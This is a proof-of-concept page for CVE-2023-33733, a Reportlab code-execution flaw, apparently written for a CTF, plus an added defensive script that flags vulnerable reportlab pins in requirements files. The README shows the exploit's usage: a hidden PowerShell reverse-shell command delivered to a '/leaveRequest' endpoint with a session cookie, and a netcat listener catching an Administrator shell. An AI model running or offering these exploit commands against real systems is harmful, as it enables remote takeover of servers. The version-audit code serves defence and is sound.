CVE-2023-33733 PoC — Reportlab Security Vulnerability

Associated Vulnerability
Title: Reportlab Security Vulnerability (CVE-2023-33733)
Description: Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
Readme
# CVE-2023-33733-POC

# Disclaimer
I did not, nor do I take credit for finding this vulnerability.  This is simply a script I built to more easily exploit this vulnerability for a CTF.
For the original information please reference: https://github.com/c53elyas/CVE-2023-33733


This script is simply intended to be a quick Python3 Script to exploit CVE-2023-33733.  You will need to provide the host, port, command, and a valid session cookie.


# Help Menu
```
kali@kali:~/Desktop$ python3 exp.py --help 
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION

options:
  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie
```

# Usage
```
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500


# Listener
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246
whoami
Administrator
```
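
A defensive check for the affected range stated in the description above, added here as an example and not part of the original README or PoC script: it scans a requirements file for `reportlab` pins at or below 3.6.12. The function names, verdict strings and sample input are assumptions constructed for illustration.

```python
import re

LAST_AFFECTED = (3, 6, 12)  # "up to v3.6.12", from the description on this page

# The package name, optional extras, then whatever version specifier follows.
REQ_RE = re.compile(r"^reportlab(?![\w.-])\s*(?:\[[^\]]*\])?\s*(.*)$", re.IGNORECASE)


def parse_version(text):
    """Turn '3.6.12' into (3, 6, 12); missing components count as 0."""
    parts = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def audit_requirements(requirements_text):
    """Return (line_number, verdict) for every reportlab requirement line."""
    findings = []
    for number, raw in enumerate(requirements_text.splitlines(), start=1):
        # Drop comments and environment markers before matching.
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        match = REQ_RE.match(line)
        if not match:
            continue
        spec = match.group(1).strip()
        if spec.startswith("==") and "*" not in spec:
            version = parse_version(spec.lstrip("="))
            verdict = "affected" if version <= LAST_AFFECTED else "above affected range"
        else:
            # Ranges and bare names can resolve to anything; check the installed version.
            verdict = "unpinned"
        findings.append((number, verdict))
    return findings


# Constructed sample input, not taken from any real project.
SAMPLE = """\
flask==2.3.2
reportlab==3.6.12
ReportLab[extra] == 3.5.68 ; python_version >= "3.7"
reportlab-extras==1.0   # different (made-up) package name, ignored
reportlab>=3.6
reportlab==3.6.13
"""

if __name__ == "__main__":
    for number, verdict in audit_requirements(SAMPLE):
        print(f"line {number}: {verdict}")
```

An `unpinned` verdict means the file alone cannot answer the question; compare the version actually installed in the environment against the same bound.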
File Snapshot

```
[4.0K] /data/pocs/76c715fcb86ce23542d640f4e8367d909c164088
├── [3.5K] exp.py
└── [1.3K] README.md

0 directories, 2 files
```